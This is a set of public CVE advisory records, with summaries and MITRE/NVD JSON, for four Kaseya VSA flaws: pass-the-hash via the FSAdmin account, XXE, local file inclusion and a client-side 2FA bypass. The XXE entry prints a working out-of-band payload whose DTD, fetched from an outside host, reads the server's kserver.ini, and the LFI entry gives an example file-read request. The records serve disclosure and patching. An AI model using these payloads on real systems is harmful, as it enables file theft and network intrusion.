An issue was discovered in Kaseya VSA RMM through 9.5.0.22. When using the default configuration, the LAN Cache feature creates a local account FSAdminxxxxxxxxx (e.g., FSAdmin123456789) on the server that hosts the LAN Cache and all clients that are assigned to a LAN Cache. This account is placed into the local Administrators group of all clients assigned to the LAN Cache. When the assigned client is a Domain Controller, the FSAdminxxxxxxxxx account is created as a domain account and automatically added as a member of the domain BUILTIN\Administrators group. Using the well known Pass-the-Hash techniques, an attacker can use the same FSAdminxxxxxxxxx hash from any LAN Cache client and pass this to a Domain Controller, providing administrative rights to the attacker on any Domain Controller. (Local account Pass-the-Hash mitigations do not protect domain accounts.)
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T00:19:41.084Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.kaseya.com/products/vsa/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://community.kaseya.com/xsp/f/355.aspx"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lockstepgroup.com/blog/abusing-the-kaseya-lan-cache-fsadmin/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lockstepgroup.com/blog/cve-2019-14510-abusing-the-kaseya-lan-cache-fsadmin-red-team-edition/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://community.kaseya.com/xsp/f/355/t/24675.aspx"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in Kaseya VSA RMM through 9.5.0.22. When using the default configuration, the LAN Cache feature creates a local account FSAdminxxxxxxxxx (e.g., FSAdmin123456789) on the server that hosts the LAN Cache and all clients that are assigned to a LAN Cache. This account is placed into the local Administrators group of all clients assigned to the LAN Cache. When the assigned client is a Domain Controller, the FSAdminxxxxxxxxx account is created as a domain account and automatically added as a member of the domain BUILTIN\\Administrators group. Using the well known Pass-the-Hash techniques, an attacker can use the same FSAdminxxxxxxxxx hash from any LAN Cache client and pass this to a Domain Controller, providing administrative rights to the attacker on any Domain Controller. (Local account Pass-the-Hash mitigations do not protect domain accounts.)"
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-10-11T11:44:18",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.kaseya.com/products/vsa/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://community.kaseya.com/xsp/f/355.aspx"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lockstepgroup.com/blog/abusing-the-kaseya-lan-cache-fsadmin/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lockstepgroup.com/blog/cve-2019-14510-abusing-the-kaseya-lan-cache-fsadmin-red-team-edition/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://community.kaseya.com/xsp/f/355/t/24675.aspx"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2019-14510",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An issue was discovered in Kaseya VSA RMM through 9.5.0.22. When using the default configuration, the LAN Cache feature creates a local account FSAdminxxxxxxxxx (e.g., FSAdmin123456789) on the server that hosts the LAN Cache and all clients that are assigned to a LAN Cache. This account is placed into the local Administrators group of all clients assigned to the LAN Cache. When the assigned client is a Domain Controller, the FSAdminxxxxxxxxx account is created as a domain account and automatically added as a member of the domain BUILTIN\\Administrators group. Using the well known Pass-the-Hash techniques, an attacker can use the same FSAdminxxxxxxxxx hash from any LAN Cache client and pass this to a Domain Controller, providing administrative rights to the attacker on any Domain Controller. (Local account Pass-the-Hash mitigations do not protect domain accounts.)"
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.kaseya.com/products/vsa/",
"refsource": "MISC",
"url": "https://www.kaseya.com/products/vsa/"
},
{
"name": "http://community.kaseya.com/xsp/f/355.aspx",
"refsource": "MISC",
"url": "http://community.kaseya.com/xsp/f/355.aspx"
},
{
"name": "https://lockstepgroup.com/blog/abusing-the-kaseya-lan-cache-fsadmin/",
"refsource": "MISC",
"url": "https://lockstepgroup.com/blog/abusing-the-kaseya-lan-cache-fsadmin/"
},
{
"name": "https://lockstepgroup.com/blog/cve-2019-14510-abusing-the-kaseya-lan-cache-fsadmin-red-team-edition/",
"refsource": "MISC",
"url": "https://lockstepgroup.com/blog/cve-2019-14510-abusing-the-kaseya-lan-cache-fsadmin-red-team-edition/"
},
{
"name": "http://community.kaseya.com/xsp/f/355/t/24675.aspx",
"refsource": "MISC",
"url": "http://community.kaseya.com/xsp/f/355/t/24675.aspx"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-14510",
"datePublished": "2019-10-11T11:44:18",
"dateReserved": "2019-08-01T00:00:00",
"dateUpdated": "2024-08-05T00:19:41.084Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-30201 (GCVE-0-2021-30201)
Vulnerability from nvd – Published: 2021-07-09 13:25 – Updated: 2024-08-03 22:24
VLAI?
Summary
The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:kas="KaseyaWS"> <soapenv:Header/> <soapenv:Body> <kas:PrimitiveResetPassword> <!--type: string--> <kas:XmlRequest><![CDATA[<!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob.dtd"><data>&send;</data>]]> </kas:XmlRequest> </kas:PrimitiveResetPassword> </soapenv:Body> </soapenv:Envelope> ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` <!ENTITY % file SYSTEM "file://c:\\kaseya\\kserver\\kserver.ini"> <!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\kaseya\\kserver\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request. ---> There is an error in XML document (24, -1000).\r\n\r\nSystem.Xml.XmlException: Fragment identifier '######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## <snip> ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network.
Severity ?
7.5 (High)
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Credits
Discovered by Wietse Boonstra of DIVD
Additional research by Frank Breedijk of DIVD
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T22:24:59.560Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/CVE-2021-30201"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "en",
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"descriptions": [
{
"lang": "en",
"value": "The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 \u003csoapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:kas=\"KaseyaWS\"\u003e \u003csoapenv:Header/\u003e \u003csoapenv:Body\u003e \u003ckas:PrimitiveResetPassword\u003e \u003c!--type: string--\u003e \u003ckas:XmlRequest\u003e\u003c![CDATA[\u003c!DOCTYPE data SYSTEM \"http://192.168.1.170:8080/oob.dtd\"\u003e\u003cdata\u003e\u0026send;\u003c/data\u003e]]\u003e \u003c/kas:XmlRequest\u003e \u003c/kas:PrimitiveResetPassword\u003e \u003c/soapenv:Body\u003e \u003c/soapenv:Envelope\u003e ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` \u003c!ENTITY % file SYSTEM \"file://c:\\\\kaseya\\\\kserver\\\\kserver.ini\"\u003e \u003c!ENTITY % eval \"\u003c!ENTITY \u0026#x25; error SYSTEM \u0027file:///nonexistent/%file;\u0027\u003e\"\u003e %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\\\kaseya\\\\kserver\\\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 \u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\u003csoap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\u003e\u003csoap:Body\u003e\u003csoap:Fault\u003e\u003cfaultcode\u003esoap:Server\u003c/faultcode\u003e\u003cfaultstring\u003eServer was unable to process request. ---\u0026gt; There is an error in XML document (24, -1000).\\r\\n\\r\\nSystem.Xml.XmlException: Fragment identifier \u0027######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## \u003csnip\u003e ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-04-04T06:25:20",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/CVE-2021-30201"
}
],
"solutions": [
{
"lang": "en",
"value": "Upgrade to version 9.5.6 or higher"
}
],
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
},
"title": "Unauthenticated XML External Entity vulnerability in Kaseya VSA \u003c v9.5.6",
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-30201",
"STATE": "PUBLIC",
"TITLE": "Unauthenticated XML External Entity vulnerability in Kaseya VSA \u003c v9.5.6"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "eng",
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 \u003csoapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:kas=\"KaseyaWS\"\u003e \u003csoapenv:Header/\u003e \u003csoapenv:Body\u003e \u003ckas:PrimitiveResetPassword\u003e \u003c!--type: string--\u003e \u003ckas:XmlRequest\u003e\u003c![CDATA[\u003c!DOCTYPE data SYSTEM \"http://192.168.1.170:8080/oob.dtd\"\u003e\u003cdata\u003e\u0026send;\u003c/data\u003e]]\u003e \u003c/kas:XmlRequest\u003e \u003c/kas:PrimitiveResetPassword\u003e \u003c/soapenv:Body\u003e \u003c/soapenv:Envelope\u003e ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` \u003c!ENTITY % file SYSTEM \"file://c:\\\\kaseya\\\\kserver\\\\kserver.ini\"\u003e \u003c!ENTITY % eval \"\u003c!ENTITY \u0026#x25; error SYSTEM \u0027file:///nonexistent/%file;\u0027\u003e\"\u003e %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\\\kaseya\\\\kserver\\\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 \u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\u003csoap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\u003e\u003csoap:Body\u003e\u003csoap:Fault\u003e\u003cfaultcode\u003esoap:Server\u003c/faultcode\u003e\u003cfaultstring\u003eServer was unable to process request. ---\u0026gt; There is an error in XML document (24, -1000).\\r\\n\\r\\nSystem.Xml.XmlException: Fragment identifier \u0027######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## \u003csnip\u003e ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network."
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"name": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021",
"refsource": "CONFIRM",
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
},
{
"name": "https://csirt.divd.nl/DIVD-2021-00011",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"name": "https://csirt.divd.nl/CVE-2021-30201",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/CVE-2021-30201"
}
]
},
"solution": [
{
"lang": "en",
"value": "Upgrade to version 9.5.6 or higher"
}
],
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-30201",
"datePublished": "2021-07-09T13:25:37",
"dateReserved": "2021-04-07T00:00:00",
"dateUpdated": "2024-08-03T22:24:59.560Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-30121 (GCVE-0-2021-30121)
Vulnerability from nvd – Published: 2021-07-09 13:24 – Updated: 2024-08-03 22:24
VLAI?
Summary
Semi-authenticated local file inclusion The contents of arbitrary files can be returned by the webserver Example request: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\Kaseya\WebPages\dl.asp` A valid sessionId is required but can be easily obtained via CVE-2021-30118
Severity ?
6.5 (Medium)
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Credits
Discovered by Wietse Boonstra of DIVD
Additional research by Frank Breedijk of DIVD
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T22:24:59.547Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/CVE-2021-30121"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "en",
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"descriptions": [
{
"lang": "en",
"value": "Semi-authenticated local file inclusion The contents of arbitrary files can be returned by the webserver Example request: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\\Kaseya\\WebPages\\dl.asp` A valid sessionId is required but can be easily obtained via CVE-2021-30118"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-04-04T06:25:19",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/CVE-2021-30121"
}
],
"solutions": [
{
"lang": "en",
"value": "Upgrade to a version above 9.5.6"
}
],
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
},
"title": "(Semi-)Authenticated local file inclusion in Kaseya VSA \u003c v9.5.6",
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-30121",
"STATE": "PUBLIC",
"TITLE": "(Semi-)Authenticated local file inclusion in Kaseya VSA \u003c v9.5.6"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "eng",
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Semi-authenticated local file inclusion The contents of arbitrary files can be returned by the webserver Example request: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\\Kaseya\\WebPages\\dl.asp` A valid sessionId is required but can be easily obtained via CVE-2021-30118"
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"name": "https://csirt.divd.nl/DIVD-2021-00011",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"name": "https://csirt.divd.nl/CVE-2021-30121",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/CVE-2021-30121"
}
]
},
"solution": [
{
"lang": "en",
"value": "Upgrade to a version above 9.5.6"
}
],
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-30121",
"datePublished": "2021-07-09T13:24:28",
"dateReserved": "2021-04-02T00:00:00",
"dateUpdated": "2024-08-03T22:24:59.547Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-30120 (GCVE-0-2021-30120)
Vulnerability from nvd – Published: 2021-07-09 13:22 – Updated: 2024-08-03 22:24
VLAI?
Summary
Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement. The need to use 2FA for authentication in enforce client-side instead of server-side and can be bypassed using a local proxy. Thus rendering 2FA useless. Detailed description --- During the login process, after the user authenticates with username and password, the server sends a response to the client with the booleans MFARequired and MFAEnroled. If the attacker has obtained a password of a user and used an intercepting proxy (e.g. Burp Suite) to change the value of MFARequered from True to False, there is no prompt for the second factor, but the user is still logged in.
Severity ?
9.9 (Critical)
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Credits
Discovered by Wietse Boonstra of DIVD
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T22:24:59.669Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csrit.divd.nl/DIVD-2021-00011"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csrit.divd.nl/CVE-2021-30120"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Discovered by Wietse Boonstra of DIVD"
}
],
"descriptions": [
{
"lang": "en",
"value": "Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement. The need to use 2FA for authentication in enforce client-side instead of server-side and can be bypassed using a local proxy. Thus rendering 2FA useless. Detailed description --- During the login process, after the user authenticates with username and password, the server sends a response to the client with the booleans MFARequired and MFAEnroled. If the attacker has obtained a password of a user and used an intercepting proxy (e.g. Burp Suite) to change the value of MFARequered from True to False, there is no prompt for the second factor, but the user is still logged in."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.9,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-04-04T06:25:18",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csrit.divd.nl/DIVD-2021-00011"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csrit.divd.nl/CVE-2021-30120"
}
],
"solutions": [
{
"lang": "en",
"value": "Upgrade to a version above 9.5.6"
}
],
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
},
"title": "2FA bypass in Kaseya VSA \u003c= v9.5.6",
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-30120",
"STATE": "PUBLIC",
"TITLE": "2FA bypass in Kaseya VSA \u003c= v9.5.6"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra of DIVD"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement. The need to use 2FA for authentication in enforce client-side instead of server-side and can be bypassed using a local proxy. Thus rendering 2FA useless. Detailed description --- During the login process, after the user authenticates with username and password, the server sends a response to the client with the booleans MFARequired and MFAEnroled. If the attacker has obtained a password of a user and used an intercepting proxy (e.g. Burp Suite) to change the value of MFARequered from True to False, there is no prompt for the second factor, but the user is still logged in."
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
